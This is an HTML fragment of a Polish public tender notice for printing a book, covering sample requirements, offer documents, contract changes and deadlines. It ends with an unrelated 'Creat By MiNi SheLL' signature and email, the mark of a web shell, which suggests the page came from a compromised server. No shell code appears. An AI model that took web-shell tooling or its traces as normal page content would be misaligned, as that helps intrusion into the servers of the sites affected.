Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda złożenia wraz z ofertą przedmiotowych środków dowodowych na<br/>potwierdzenie zgodności oferowanych usług z wymaganiami określonymi w opisie przedmiotu<br/>zamówienia związanymi z realizacją zamówienia to jest: Próbki czyli przykładowej drukowanej<br/>książki, o cechach i parametrach zbliżonych do parametrów opisanych w specyfikacji publikacji<br/>stanowiącej przedmiot niniejszego zamówienia publicznego (załącznik nr 1 do SWZ – opis<br/>przedmiotu zamówienia), umożliwiających zbadanie jakości wykonania we wskazanych w<br/>rozdziale XV parametrach oceny. Próbka musi być zrealizowana przez podmiot, który będzie<br/>realizował zamówienie objęte niniejszą SWZ.<br/>Przedmiot próbki, o którym mowa powyżej, będzie podlegał badaniu na potwierdzenie zgodności<br/>oferowanych usług z przedmiotem zamówienia oraz będzie podlegał ocenie w ramach kryterium<br/>pozacenowego „Jakość wykonania”, zgodnie z rozdz. XV SWZ.<br/>Oferty nie spełniające minimalnego akceptowalnego poziomu jakości dla każdego z parametrów<br/>w tabeli służącej ocenie w kryterium „jakość wykonania” (ustalonego na podstawie próbki<br/>przedłożonej jako przedmiotowy środek dowodowy) w zostaną odrzucone.<br/>W przypadku, gdy w przedłożonej próbce nie będzie możliwa ocena któregoś z parametrów<br/>Zamawiający dla danego parametru przyzna zero (0) punktów. Niezłożenie próbki bądź złożenie<br/>takiej próbki, dla której niemożliwa będzie identyfikacja jej wytwórcy (drukarni, która zrealizowała<br/>przedłożoną próbkę) stanowiło będzie podstawę do odrzucenia oferty Wykonawcy jako<br/>nieodpowiadającej treści SWZ (próbka musi zawierać informację umieszczoną trwale w książce<br/>lub musi jej towarzyszyć dokument potwierdzający/ dowód np. nadruk w książce lub inne trwałe<br/>oznaczenie książki, załączona kopia faktury wraz z protokołem odbioru). Przedłożona do oceny<br/>próbka winna być zrealizowana przez podmiot, który będzie faktycznie realizował usługę druku<br/>publikacji w ramach niniejszego zamówienia publicznego. Sposób oceny próbek w kryterium<br/>„Jakość wykonania” zostały opisany został w rozdziale XV SWZ.<br/>Wymaganą, przez Zamawiającego w przedmiotowym postępowaniu próbkę, o której mowa w<br/>niniejszej SWZ należy złożyć, na mocy postanowień art. 65 ust. 2 ustawy Pzp, w postaci<br/>drukowanej książki i oznaczyć zgodnie z instrukcją podaną w rozdziale XIX niniejszej SWZ oraz<br/>złożyć z zachowaniem nieprzekraczalnego terminu wyznaczonego na składanie ofert w<br/>niniejszym postępowaniu. Złożenie próbki do oferty odbywa się za pośrednictwem operatora<br/>pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 – Prawo pocztowe (tekst jednolity<br/>Dz.U. z 2020r. poz. 1041 ze zmianami), osobiście lub za pośrednictwem posłańca.<br/>Zamawiający nie będzie wzywał do złożenia lub uzupełnienia przedmiotowych środków<br/>dowodowych – próbki służącej ocenie ofert w kryterium „Jakość wykonania”. Zamawiający może<br/>żądać od Wykonawców wyjaśnień dotyczących przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> oferta winna zawierać:<br/>1) Wypełniony i podpisany formularz OFERTY sporządzony według załączonego wzoru, który<br/>stanowi załącznik nr 2 do SWZ<br/>2) oświadczenie Wykonawcy, o którym mowa w Rozdziale VII pkt 1 SWZ - wg załącznika nr 4 do<br/>SWZ – potwierdzające brak podstaw wykluczenia,<br/>Jeżeli dotyczy – również oświadczenia każdego z Wykonawców spośród Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - w zakresie potwierdzenia braku podstaw<br/>wykluczenia Wykonawcy,<br/>3) dokumenty, z których wynika prawo do podpisania oferty. Zgodnie z § 13 ust. 1<br/>Rozporządzenia Ministra Rozwoju, Pracy i Technologii - w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana<br/>do jego reprezentowania, zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego<br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru. Jeśli umocowanie osoby składającej ofertę nie wynika z dokumentów<br/>rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien<br/>dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do<br/>złożenia oferty lub do złożenia oferty i podpisania umowy;<br/>4) próbkę do oceny jakości wykonania złożoną odrębnie, z uwzględnieniem odstępstwa co do<br/>formy złożenia, na zasadzie art. 65 ust. 1 pkt 4 ustawy Pzp i art. 65 ust. 2 ustawy Pzp, zgodnie z<br/>rozdz. VIII SWZ;<br/>Uwaga! Formularz oferty wraz załącznikami innymi niż próbka, wskazana w niniejszym punkcie -<br/>składa się za pomocą środków komunikacji elektronicznej, zgodnie z SWZ. Próbkę składa się<br/>odrębnie, zgodnie z wymaganiami i wskazaniami określonymi w rozdziale VIII SWZ –<br/>przedmiotowe środki dowodowe. Złożenie próbki do oferty odbywa się za pośrednictwem<br/>operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 – Prawo pocztowe (tekst<br/>jednolity Dz.U.z 2020 poz.1041 ze zmianami), osobiście lub za pośrednictwem posłańca;<br/>5) oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny<br/>skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę<br/>przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli<br/>Wykonawca zastrzega takie informacje). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Dokument<br/>potwierdzający ustanowienie pełnomocnika musi być podpisany przez wszystkich Wykonawców<br/>ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby<br/>uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze.<br/>2. Spółkę cywilną należy traktować jako Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za realizację umowy.<br/>4. Żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać<br/>wykluczeniu z postępowania, zatem Zamawiający będzie sprawdzać, czy nie zachodzą, wobec<br/>każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podstawy<br/>wykluczenia, o których mowa w art. 108 ust.1 i art. 109 ust. 1 pkt 4), 5) i 7) ustawy Pzp.<br/>5. Wobec powyższego, oświadczenie o którym mowa w rozdz. VII pkt 1 składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany umowy wymagają zgody obu Stron i zachowania formy pisemnej pod rygorem<br/>nieważności i będą dopuszczalne w granicach unormowania 455 oraz z uwzględnieniem<br/>zapisów art. 454 ustawy Prawo zamówień publicznych.2. Zamawiający,<br/>działając zgodnie z art. 455 ust. 1, dopuszcza również możliwość zmianyumowy, bez<br/>przeprowadzenia nowego postępowania, w następujących okolicznościach i wzakresie:1)<br/>zmiany wysokości wynagrodzenia Wykonawcy w przypadku zmiany ustawowej zmiany<br/>stawki podatku VAT – wynagrodzenie Wykonawcy określone w umowie zostanie zmienione<br/>z uwzględnieniem nowej stawki podatku VAT. Zmiana wysokości wynagrodzenia<br/>należnego Wykonawcy będzie odnosić się wyłącznie do części przedmiotu umowy<br/>zrealizowanej<br/>zgodnie z terminami ustalonymi w umowie, po dniu wejścia w życie przepisów zmieniających<br/>stawkę podatku od towarów i usług oraz wyłącznie do części przedmiotu umowy, do<br/>której zastosowanie znajdzie zmiana stawki podatku od towarów i usług. Wartość<br/>wynagrodzenia<br/>netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczona na podstawie<br/>nowychprzepisów2) gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę w<br/>wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie przejęcia,<br/>połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia<br/>dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia<br/>warunki<br/>udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to<br/>za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów<br/>ustawy,3) zmiany terminu realizacji przedmiotu umowy: w sytuacji gdy w czasie trwania umowy<br/>z przyczyn niezawinionych przez Wykonawcę nastąpi konieczność zmiany terminu<br/>realizacji przedmiotu umowy. Zmiana nie może spowodować zmiany ceny wynikającej z<br/>oferty Wykonawcy. Zmiana może dotyczyć terminu wykonania umowy bez naliczania kar<br/>umownych;4) zmiany odpowiednich zapisów umowy, w sytuacji gdy w czasie trwania umowy<br/>wystąpią zdarzenia siły wyższej rozumianej jako zewnętrzne, nieprzewidziane zdarzenia<br/>pozostające poza kontrolą Stron, w szczególności wojny i innego działania o charakterze<br/>zbrojnym, działania siły przyrody, akty terroru, zamieszki, rozruchy, strajki i inne działania<br/>zagrażające porządkowi publicznemu, decyzje lub działania władz publicznych, a także klęski<br/>żywiołowe, niemożliwych do przewidzenia i zapobieżenia, których nie dało się uniknąć nawet<br/>przy zachowaniu najwyższej staranności, a które uniemożliwią Wykonawcy wykonanie jego<br/>zobowiązania w części lubcałości,5) odpowiednich zapisów umowy, w sytuacji gdy w czasie<br/>trwania umowy konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego (wyłącznie w zakresie wynikającym ze zmian prawa); 6) powierzenia określonego zakresu<br/>podwykonawcy lub zmiany zakresu części prac powierzonych podwykonawcy w przypadku, gdy<br/>wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części zamówienia3.<br/>Strony dopuszczają ponadto zmiany treści umowy w zakresie zmiany sposobu<br/>wykonania przedmiotu umowy lub zmiany terminu wykonania, w okresie stanu zagrożenia<br/>epidemicznego lub stanu epidemii ogłoszonego z powodu COVID-19 i innych chorób zakaźnych<br/>oraz wywołanymi nimi sytuacjami kryzysowymi, które szczegółowo zostały opisane w paragrafie<br/>10 projektowanych postanowień umowy - załącznik nr 3 do SWZ. Inicjatorem zmian może być<br/>Zamawiający lub Wykonawca poprzez pisemne wystąpienie w okresie obowiązywania umowy<br/>zawierające opis proponowanych zmian i ich uzasadnienie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-10 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/asp_krakow/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-10 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Uwaga:<br/>Oferta, która otrzyma mniej punktów w kryterium oceny jakości wykonania, niż wynosi<br/>akceptowalny minimalny poziom jakości wykonania, dla każdego z ocenianych parametrów,<br/>zostanie uznana jako niezgodna z warunkami zamówienia i zostanie odrzucona na podstawie<br/>art. 226 ust. 1 pkt 5

Creat By MiNi SheLL
Email: jattceo@gmail.com